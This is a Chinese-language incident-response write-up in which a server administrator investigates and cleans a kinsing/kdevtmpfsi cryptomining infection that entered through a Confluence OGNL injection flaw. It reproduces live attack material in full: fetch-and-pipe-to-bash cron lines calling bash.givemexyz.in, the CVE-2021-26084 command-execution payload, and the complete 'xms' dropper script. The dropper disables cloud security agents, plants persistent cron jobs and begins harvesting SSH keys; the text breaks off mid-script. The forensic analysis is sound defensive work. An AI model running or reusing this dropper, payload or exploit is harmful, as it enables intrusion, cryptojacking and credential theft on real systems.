cpu持续繁忙,使用top命令查看
top - 09:55:44 up 11:39, 2 users, load average: 2.48, 2.95, 3.45
Tasks: 135 total, 1 running, 134 sleeping, 0 stopped, 0 zombie
%Cpu(s): 51.9 us, 6.8 sy, 0.0 ni, 40.3 id, 0.0 wa, 0.0 hi, 1.0 si, 0.0 st
KiB Mem : 7898900 total, 3735748 free, 3614008 used, 549144 buff/cache
KiB Swap: 6254588 total, 4140812 free, 2113776 used. 3984796 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
16679 root 20 0 162016 2400 1644 R 1.3 0.0 0:00.09 top
2383 root 20 0 5768156 147064 1268 S 0.7 1.9 6:23.06 java
4500 root 20 0 113204 1480 1204 S 0.7 0.0 0:02.51 sh
9988 root 20 0 4753612 292844 5984 S 0.7 3.7 13:14.51 java
9 root 20 0 0 0 0 S 0.3 0.0 1:31.22 rcu_sched
2469 apache 20 0 2894752 53204 3900 S 0.3 0.7 0:23.69 httpd
9122 root 20 0 0 0 0 S 0.3 0.0 0:00.12 kworker/u8:2
12914 root 20 0 26840 192 120 S 0.3 0.0 0:10.05 quu
1 root 20 0 193900 5072 3156 S 0.0 0.1 0:52.04 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.08 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.99 ksoftirqd/0
5 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:0H
7 root rt 0 0 0 0 S 0.0 0.0 0:01.45 migration/0
8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh
12 root rt 0 0 0 0 S 0.0 0.0 0:04.27 migration/1
13 root 20 0 0 0 0 S 0.0 0.0 0:07.48 ksoftirqd/1
15 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/1:0H
17 root rt 0 0 0 0 S 0.0 0.0 0:01.42 migration/2
18 root 20 0 0 0 0 S 0.0 0.0 0:00.95 ksoftirqd/2
20 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/2:0H
22 root rt 0 0 0 0 S 0.0 0.0 0:04.21 migration/3
23 root 20 0 0 0 0 S 0.0 0.0 0:07.62 ksoftirqd/3
25 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/3:0H
27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kdevtmpfs
28 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 netns
29 root 20 0 0 0 0 S 0.0 0.0 0:00.05 khungtaskd
30 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 writeback
31 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kintegrityd
32 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 bioset
33 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kblockd
34 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 md
42 root 20 0 0 0 0 S 0.0 0.0 0:21.48 kswapd0
43 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
44 root 39 19 0 0 0 S 0.0 0.0 0:01.42 khugepaged
45 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 crypto
53 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kthrotld
发现有很多kworker,kthreadd等k开头的进程,cpu占用都不是很高,但是整体cpu占用较高,上面的输出包含一个sh进程,是我写的循环kill可疑进程的脚步,如下
clean.sh
while true
do
ps -ef |grep kdevtmpfsi|grep -v grep |awk '{print $2}'|xargs kill -9
ps -ef |grep ksoftirqd|grep -v grep |awk '{print $2}'|xargs kill -9
##ps -ef |grep synsi|grep -v grep |awk '{print $2}'|xargs kill -9
ps -ef |grep kthreadd|grep -v grep |awk '{print $2}'|xargs kill -9
ps -ef |grep kworker|grep -v grep |awk '{print $2}'|xargs kill -9
ps -ef |grep solrd|grep -v grep |awk '{print $2}'|xargs kill -9
ps -ef |grep "solr.sh"|grep -v grep |awk '{print $2}'|xargs kill -9
ps -ef |grep "syne"|grep -v grep |awk '{print $2}'|xargs kill -9
sleep 1
done
通过下面的命令让脚本后台运行,1秒删除一次
nohup sh clean.sh &
很明显上面的top命令已经被劫持,输出不是真实的进程,使用busybox工具查看如下
root@192.168.1.3:bin ./busybox top
Mem: 4246580K used, 3652320K free, 8696K shrd, 36K buff, 458100K cached
CPU: 50% usr 0% sys 0% nic 50% idle 0% io 0% irq 0% sirq
Load average: 2.60 2.72 3.24 3/718 25512
PID PPID USER STAT VSZ %VSZ CPU %CPU COMMAND
10725 1 root S 2673m 34% 3 48% /tmp/kdevtmpfsi
9988 1 root S 546m 7% 0 2% /usr/bin/java -Djava.util.logging.config.file=/home/web/bitbucket/bitbucket-4.14.4/instance/conf/logging.properties -Djava.util
2469 2285 apache S 2826m 36% 2 0% /usr/sbin/httpd -DFOREGROUND
5431 2285 apache S 2650m 34% 2 0% /usr/sbin/httpd -DFOREGROUND
2471 2285 apache S 2648m 34% 2 0% /usr/sbin/httpd -DFOREGROUND
2470 2285 apache S 2630m 33% 1 0% /usr/sbin/httpd -DFOREGROUND
32402 1 mysql S 1604m 20% 3 0% /usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid
2383 1 root S 1536m 20% 0 0% /usr/bin/java -Djava.util.logging.config.file=/home/web/apache-tomcat-8.0.53/conf/logging.properties -Djava.util.logging.manage
2315 1 root S 920m 12% 3 0% node /home/web/linux-dash/app/server/index.js
3259 1 root S 784m 10% 0 0% /home/web/frp_0.25.1_linux_386/frpc -c /home/web/frp_0.25.1_linux_386/frpc.ini
27030 1 root S 701m 9% 3 0% /etc/kinsing
2287 1 root S 551m 7% 3 0% {tuned} /usr/bin/python -Es /usr/sbin/tuned -l -P
837 1 root S 542m 7% 1 0% /usr/sbin/NetworkManager --no-daemon
838 1 polkitd S 526m 7% 1 0% /usr/lib/polkit-1/polkitd --no-debug
2300 1 root S 522m 7% 3 0% {fail2ban-server} /usr/bin/python -s /usr/bin/fail2ban-server -xf start
2285 1 root S 386m 5% 3 0% /usr/sbin/httpd -DFOREGROUND
20801 1 root S 330m 4% 2 0% {firewalld} /usr/bin/python -Es /usr/sbin/firewalld --nofork --nopid
2434 2285 apache S 287m 4% 0 0% /usr/sbin/httpd -DFOREGROUND
834 1 root S 258m 3% 3 0% /usr/sbin/rsyslogd -n
516 1 root S 192m 2% 1 0% /usr/sbin/lvmetad -f
1 0 root S 189m 2% 3 0% /usr/lib/systemd/systemd --switched-root --system --deserialize 21
28238 8983 root S 148m 2% 1 0% sshd: root@pts/1
20524 8983 root S 148m 2% 1 0% sshd: root@pts/0
881 837 root S 112m 1% 3 0% /sbin/dhclient -d -q -sf /usr/libexec/nm-dhcp-helper -pf /var/run/dhclient-enp1s0.pid -lf /var/lib/NetworkManager/dhclient-9021
28571 28238 root S 112m 1% 3 0% -bash
20844 20524 root S 112m 1% 3 0% -bash
4500 28571 root S 110m 1% 3 0% sh clean.sh
8983 1 root S 107m 1% 1 0% /usr/sbin/sshd -D
8990 1 root S 107m 1% 1 0% /sbin/agetty --noclear tty1 linux
25511 4500 root S 107m 1% 3 0% sleep 1
825 1 dbus S 98356 1% 1 0% /bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
499 1 root S 92216 1% 1 0% /usr/lib/systemd/systemd-journald
2347 1 root S 88780 1% 1 0% sendmail: accepting connections
2403 1 smmsp S 84216 1% 3 0% sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
30637 1 root S 76272 1% 1 0% /usr/bin/bsd-port/getty
797 1 root S< 55508 1% 1 0% /sbin/auditd
880 1 root S 54628 1% 3 0% /usr/sbin/wpa_supplicant -u -f /var/log/wpa_supplicant.log -c /etc/wpa_supplicant/wpa_supplicant.conf -P /var/run/wpa_supplican
527 1 root S 46924 1% 0 0% /usr/lib/systemd/systemd-udevd
12914 1 root S 26840 0% 1 0% ./quu
此时看到的才是真实的进程信息,可以看到/tmp/kdevtmpfsi这个进程占用了34%的cpu,如果我的1秒循环kill脚本不运行,cpu会被这个进程占满
#查看定时任务
root@192.168.1.3:bin crontab -l
*/30 * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms
##
root@192.168.1.3:bin ./busybox crontab -l
* * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms
##
删除定时任务
root@192.168.1.3:bin sudo crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/#tmp.192.168.1.3.XXXXnIIKfP to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.vjquzF
查看tmp目录
root@192.168.1.3:tmp ls -alh
total 1.4M
drwxrwxrwt. 22 root root 4.0K Sep 15 10:07 .
dr-xr-xr-x. 19 root root 284 Sep 14 22:18 ..
drwxrwxrwx. 2 root root 6 Sep 14 14:13 20210914_141323-scantem.b7c6bffbc6
drwxrwxrwx. 3 root root 32 Sep 14 14:13 20210914_141343-scantem.787984624c
-rwxrwxrwx. 1 root root 185K Sep 15 09:29 bashirc
-rw-r-----. 1 root root 73 Sep 15 09:47 conf.n
-rw-------. 1 root root 0 Sep 15 10:07 crontab.TPgC6E
-rw-------. 1 root root 0 Sep 15 10:07 crontab.vjquzF
drwxrwxrwx. 2 root root 6 Sep 14 09:10 dbusex
drwxrwxrwt. 2 root root 6 Mar 17 2019 .font-unix
-rwxr-x---. 1 root root 5 Sep 15 09:47 gates.lod
drwxrwxrwx. 2 root root 6 Sep 14 09:10 go
drwxrwxrwx. 2 root root 6 Sep 14 14:27 hsperfdata_root
drwxrwxrwx. 2 root root 6 Sep 14 09:10 i686
drwxr-x---. 2 root root 18 Sep 15 09:53 .ICEd-unix
drwxrwxrwt. 2 root root 6 Mar 17 2019 .ICE-unix
drwxrwxrwx. 2 root root 6 Sep 14 09:10 kingsing
-rw-r-----. 1 root root 0 Sep 15 09:29 .lock
-rwxr-x---. 1 root root 5 Sep 15 09:47 moni.lod
-rw-r-----. 1 root root 0 Sep 15 09:29 .python
drwxr-x---. 2 root root 38 Sep 15 08:38 .solr
-rwxr-x---. 1 root root 1.2M Sep 15 09:52 syne
drwxrwxrwx. 3 root root 17 Sep 14 22:16 systemd-private-02708b92c60147c38cdd949508165110-httpd.service-qDd0WP
drwxrwxrwx. 3 root root 17 Sep 11 21:15 systemd-private-f0162dc1f43c45209dbacffcab0dfd9c-httpd.service-GSWGjC
drwxrwxrwt. 2 root root 6 Mar 17 2019 .Test-unix
drwxrwxrwt. 2 root root 6 Mar 17 2019 .X11-unix
drwxrwxrwx. 2 root root 6 Sep 14 09:10 x64b
drwxrwxrwx. 2 root root 6 Sep 14 09:10 x86_64
drwxrwxrwx. 2 root root 6 Sep 14 09:10 x86_643
drwxrwxrwt. 2 root root 6 Mar 17 2019 .XIM-unix
drwxrwxrwx. 2 root root 6 Sep 14 09:10 zzz
编辑hosts文件添加如下内容
127.0.0.1 bash.givemexyz.in
删除定时任务
root@192.168.1.3:cron sudo rm -rf root
rm: cannot remove ‘root’: Operation not permitted
root@192.168.1.3:cron chattr -i -a root
root@192.168.1.3:cron ls -alhtr
total 4.0K
drwxr-xr-x. 11 root root 139 Sep 14 13:13 ..
-rw-------. 1 root root 280 Sep 15 09:33 root
drwxr-x---. 2 root root 18 Sep 15 10:14 crontabs
drwx------. 3 root root 34 Sep 15 10:14 .
root@192.168.1.3:cron rm -rf root
root@192.168.1.3:cron rm -rf crontabs
rm: cannot remove ‘crontabs/root’: Operation not permitted
root@192.168.1.3:cron cd crontabs/
root@192.168.1.3:crontabs ls
root
root@192.168.1.3:crontabs ls -alhtr
total 4.0K
-rw-r-----. 1 root root 277 Sep 15 09:33 root
drwxr-x---. 2 root root 18 Sep 15 10:14 .
drwx------. 3 root root 22 Sep 15 10:22 ..
root@192.168.1.3:crontabs rm -rf root
rm: cannot remove ‘root’: Operation not permitted
root@192.168.1.3:crontabs chattr -i -a root
root@192.168.1.3:crontabs rm -rf root
root@192.168.1.3:/ rm -rf tmp/
rm: cannot remove ‘tmp/’: Device or resource busy
root@192.168.1.3:/ busybox lsof|grep tmp
2287 /usr/bin/python2.7 /tmp/ffidZH0PZ (deleted)
5638 /usr/bin/.sshd (deleted) /tmp/moni.lod (deleted)
12914 /tmp/quu (deleted) socket:[5967920]
19465 /etc/kinsing /tmp/.ICEd-unix/971706110 (deleted)
20801 /usr/bin/python2.7 /tmp/ffiUKjXj4 (deleted)
25185 /tmp/kdevtmpfsi /dev/null
25185 /tmp/kdevtmpfsi /tmp/.ICEd-unix/971706110 (deleted)
25185 /tmp/kdevtmpfsi /tmp/.ICEd-unix/971706110 (deleted)
25185 /tmp/kdevtmpfsi /
25185 /tmp/kdevtmpfsi pipe:[9432437]
25185 /tmp/kdevtmpfsi pipe:[9432437]
25185 /tmp/kdevtmpfsi anon_inode:[eventpoll]
25185 /tmp/kdevtmpfsi pipe:[9432438]
25185 /tmp/kdevtmpfsi pipe:[9432438]
25185 /tmp/kdevtmpfsi anon_inode:[eventfd]
25185 /tmp/kdevtmpfsi /dev/null
25185 /tmp/kdevtmpfsi socket:[9433873]
26065 /usr/bin/bash /tmp/.ICEd-unix/HgfNa
27264 /tmp/bashirc (deleted) pipe:[8576625]
27264 /tmp/bashirc (deleted) pipe:[8576621]
27264 /tmp/bashirc (deleted) pipe:[8576621]
27264 /tmp/bashirc (deleted) /tmp/.python (deleted)
27264 /tmp/bashirc (deleted) socket:[8586904]
32402 /usr/sbin/mysqld /tmp/ibqHHsxk (deleted)
32402 /usr/sbin/mysqld /tmp/ibiIidip (deleted)
32402 /usr/sbin/mysqld /tmp/ibEOcZ2t (deleted)
32402 /usr/sbin/mysqld /tmp/ib0JR2CD (deleted)
32402 /usr/sbin/mysqld /var/lib/mysql/ibtmp1
32402 /usr/sbin/mysqld /tmp/ibKSW5QI (deleted)
参考https://bbs.huaweicloud.com/blogs/202738,找到kinsing的启动配置位置
root@192.168.1.3:system grep -r kinsing /usr/lib/systemd/system
/usr/lib/systemd/system/bot.service:ExecStart=/etc/kinsing
查看对应目录文件
root@192.168.1.3:system ls -alhtr
total 924K. ---省略若干时间很早的文件,只看最近几天的文件
-rw-r--r--. 1 root root 397 Aug 29 09:43 clamav-freshclam.service
-rw-r--r--. 1 root root 527 Aug 29 09:43 clamav-clamonacc.service
lrwxrwxrwx. 1 root root 24 Sep 14 13:13 clamonacc.service -> clamav-clamonacc.service
-rw-r-----. 1 root root 328 Sep 15 09:30 pwnrigl.service
drwxr-xr-x. 28 root root 12K Sep 15 09:30 .
-rw-r-----. 1 root root 193 Sep 15 12:43 bot.service
问题锁定在bot.service和pwnrigl.service这两个文件中
root@192.168.1.3:system cat bot.service
[Unit]
Description=Start daemon at boot time
After=
Requires=
[Service]
Type=forking
RestartSec=10s
Restart=always
TimeoutStartSec=5
ExecStart=/etc/kinsing
[Install]
WantedBy=multi-user.target
root@192.168.1.3:system cat pwnrigl.service
[Unit]
Description=pwnrig
Wants=network.target
After=syslog.target network-online.target
[Service]
Type=forking
ExecStart=/bin/bash -c 'cp -f -r -- /bin/sysdr /bin/dbused 2>/dev/null && /bin/dbused -c >/dev/null 2>&1 && rm -rf -- /bin/dbused 2>/dev/null'
Restart=always
KillMode=process
[Install]
WantedBy=multi-user.target
删除
root@192.168.1.3:system rm -rf pwnrigl.service bot.service
rm: cannot remove ‘pwnrigl.service’: Operation not permitted
root@192.168.1.3:system chattr -i -a pwnrigl.service
root@192.168.1.3:system rm -rf pwnrigl.service
禁止访问对应ip 209.141.40.190
root@192.168.1.3:redis-5.0.5 ping 209.141.40.190
PING 209.141.40.190 (209.141.40.190) 56(84) bytes of data.
64 bytes from 209.141.40.190: icmp_seq=1 ttl=51 time=219 ms
64 bytes from 209.141.40.190: icmp_seq=2 ttl=51 time=224 ms
64 bytes from 209.141.40.190: icmp_seq=3 ttl=51 time=202 ms
^C
--- 209.141.40.190 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 202.919/215.587/224.464/9.211 ms
root@192.168.1.3:redis-5.0.5 iptables -A OUTPUT -d 209.141.40.190 -j REJECT
root@192.168.1.3:redis-5.0.5 ping 209.141.40.190
PING 209.141.40.190 (209.141.40.190) 56(84) bytes of data.
From 192.168.1.3 icmp_seq=1 Destination Port Unreachable
ping: sendmsg: Operation not permitted
From 192.168.1.3 icmp_seq=2 Destination Port Unreachable
参考如下文章定位病毒是利用confluence的漏洞注入的
https://blog.csdn.net/weixin_39997829/article/details/120179000
https://github.com/h3v0x/CVE-2021-26084_Confluence/blob/main/Confluence_OGNLInjection.py
下面是confluence低版本漏洞注入和升级confluence版本后无法注入的示例
可以看到漏洞未修复时,直接可以执行pwd命令,正确输出执行结果,这样任何 脚步都能注入到服务器中,危害极大。
漏洞修复后无法执行shell命令。
centos7_20G@192.168.1.8:home python3 test.py -u http://127.0.0.1:8090
---------------------------------------------------------------
[-] Confluence Server Webwork OGNL injection
[-] CVE-2021-26084
[-] https://github.com/h3v0x
---------------------------------------------------------------
> pwd
aaaaaaaa[/home/web/confluence/confluence-6.13.2/atlassian-confluence-6.13.2/bin
]
>
修复之后
centos7_20G@192.168.1.8:home python3 test.py -u http://192.168.1.9:8090
---------------------------------------------------------------
[-] Confluence Server Webwork OGNL injection
[-] CVE-2021-26084
[-] https://github.com/h3v0x
---------------------------------------------------------------
> pwd
aaaaaaaa\u0027+{Class.forName(\u0027javax.script.ScriptEngineManager\u0027).newInstance().getEngineByName(\u0027JavaScript\u0027).\u0065val(\u0027var isWin = java.lang.System.getProperty(\u0022os.name\u0022).toLowerCase().contains(\u0022win\u0022); var cmd = new java.lang.String(\u0022pwd\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\u0022cmd.exe\u0022, \u0022/c\u0022, cmd); } else{p.command(\u0022bash\u0022, \u0022-c\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \u0022\u0022; var output = \u0022\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\u0027)}+\u0027
下载问题脚本,参考脚本可以看到具体都做了什么
wget http://bash.givemexyz.in/xms
#!/bin/bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
setenforce 0 2>/dev/null
ulimit -u 50000
sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
netstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':4444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '23.94.24.12:8080' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '134.122.17.13:8080' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '107.189.11.170:443' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
rand=$(seq 0 255 | sort -R | head -n1)
rand2=$(seq 0 255 | sort -R | head -n1)
chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
if ps aux | grep -i '[a]liyun'; then
(wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
(wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"
chattr -ai /tmp/dbused
if [ -s /usr/bin/ifconfig ];
then
range=$(ifconfig | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
else
range=$(ip a | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
fi
if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
dns=""
else
dns="-d"
fi
if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
url="http://bash.givemexyz.in"
else
url="http://209.141.40.190"
fi
echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/apache
echo -e "*/3 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/nginx
echo -e "*/30 * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
echo "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
DIR="/tmp"
cd $DIR
if [ -a "/tmp/dbused" ]
then
if [ -w "/tmp/dbused" ] && [ ! -d "/tmp/dbused" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /tmp/dbused | awk '{ print $1 }')
echo $sum
case $sum in
dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
echo "x86_64 OK"
;;
*)
echo "x86_64 wrong"
rm -rf /usr/local/lib/libkk.so
echo "" > /etc/ld.so.preload
pkill -f wc.conf
pkill -f susss
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/tmp" ]
then
DIR="/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/tmp/.sh/dbused" ]
then
DIR=$(mktemp -d)/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
get() {
chattr -i $2; rm -rf $2
wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 || lwp-download $1 $2 ||
chmod +x $2
}
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/dbused ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
echo $sum
case $sum in
dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
echo "x86_64 OK"
;;
*)
echo "x86_64 wrong"
sizeBefore=$(du $DIR/x86_64)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
download
sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
echo $sum
case $sum in
dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
echo "x86_64 OK"
cp $DIR/x86_643 $DIR/x86_64
cp $DIR/x86_643 $DIR/x86_64
;;
*)
echo "x86_64 wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
get $url/$(uname -m) "$DIR"/dbused
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
echo $sum
case $sum in
dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
echo "x86_64 OK"
cp $DIR/x86_64 $DIR/x86_643
;;
*)
echo "x86_64 wrong"
;;
esac
else
echo "No md5sum"
fi
}
judge() {
if [ ! "$(netstat -ant|grep '212.114.52.24:8080\|194.5.249.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
then
get $url/$(uname -m) "$DIR"/dbused
chmod +x "$DIR"/dbused
"$DIR"/dbused -c $dns
"$DIR"/dbused -pwn
sleep 5
else
echo "Running"
fi
}
if [ ! "$(netstat -ant|grep '212.114.52.24:8080\|194.5.249.24:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
judge
else
echo "Running"
fi
if [ ! "$(netstat -ant|grep '104.168.71.132:80'|grep 'ESTABLISHED'|grep -v grep)" ];
then
get $url/bashirc.$(uname -m) "$DIR"/bashirc
chmod 777 "$DIR"/bashirc
"$DIR"/bashirc
else
echo "Running"
fi
cronbackup() {
pay="(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR"
status=0
crona=$(systemctl is-active cron)
cronb=$(systemctl is-active crond)
cronatd=$(systemctl is-active atd)
if [ "$crona" == "active" ] ; then
echo "cron okay"
elif [ "$cronb" == "active" ]; then
echo "cron okay"
elif [ "$cronatd" == "active" ] ; then
status=1
else
status=2
fi
if [ $status -eq 1 ] ; then
for a in $(at -l|awk '{print $1}'); do at -r $a; done
echo "$pay" | at -m now + 1 minute
fi
if [ $status -eq 2 ] || [ "$me" != "root" ] ;then
arr[0]="/dev/shm"
arr[1]="/tmp"
arr[2]="/var/tmp"
arr[3]="/home/$(whoami)"
arr[4]="/run/user/$(echo $UID)"
arr[5]="/run/user/$(echo $UID)/systemd"
rand=$[$RANDOM % ${#arr[@]}]
echo "Setting up custom backup"
ps auxf|grep -v grep|grep "cruner" | awk '{print $2}'|xargs kill -9
key="while true; do sleep 60 && $pay; done"
echo -e "$key\n##" > ${arr[$rand]}/cruner && chmod 777 ${arr[$rand]}/cruner
nohup ${arr[$rand]}/cruner >/dev/null 2>&1 &
sleep 15
rm -rf ${arr[$rand]}/cruner
fi
}
cronbackup
if crontab -l | grep -q "$url"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
echo "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" | crontab -
fi
KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
